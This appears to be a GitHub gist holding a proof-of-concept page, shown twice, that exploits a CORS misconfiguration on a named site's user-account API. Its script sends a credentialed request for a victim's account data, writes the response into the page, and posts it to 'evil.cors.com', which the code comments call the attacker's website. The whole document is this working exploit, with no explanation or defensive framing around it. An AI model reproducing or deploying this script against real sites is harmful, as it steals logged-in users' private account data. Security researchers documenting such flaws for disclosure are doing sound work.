pikpikcu/gist:fd90959881691bab11eb4d8b02acd6ea

## gistfile1.txt
<html>
<body>
<button type='button' onclick='cors()'>CORS</button>
<p id='demo'></p>
<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
var a = this.responseText; // Sensitive data from niche.co about user account
document.getElementById("demo").innerHTML = a;
xhttp.open("POST", "http://evil.cors.com", true);// Sending that data to Attacker's website
xhttp.withCredentials = true;
console.log(a);
xhttp.send("data="+a);
}
};
xhttp.open("GET", "https://www.niche.co/api/v1/users/*******", true);
xhttp.withCredentials = true;
xhttp.send();
}
</script>
</body>
</html>
	<html>
	<body>
	<button type='button' onclick='cors()'>CORS</button>
	<p id='demo'></p>
	<script>
	function cors() {
	var xhttp = new XMLHttpRequest();
	xhttp.onreadystatechange = function() {
	if (this.readyState == 4 && this.status == 200) {
	var a = this.responseText; // Sensitive data from niche.co about user account
	document.getElementById("demo").innerHTML = a;
	xhttp.open("POST", "http://evil.cors.com", true);// Sending that data to Attacker's website
	xhttp.withCredentials = true;
	console.log(a);
	xhttp.send("data="+a);
	}
	};
	xhttp.open("GET", "https://www.niche.co/api/v1/users/*******", true);
	xhttp.withCredentials = true;
	xhttp.send();
	}
	</script>
	</body>
	</html>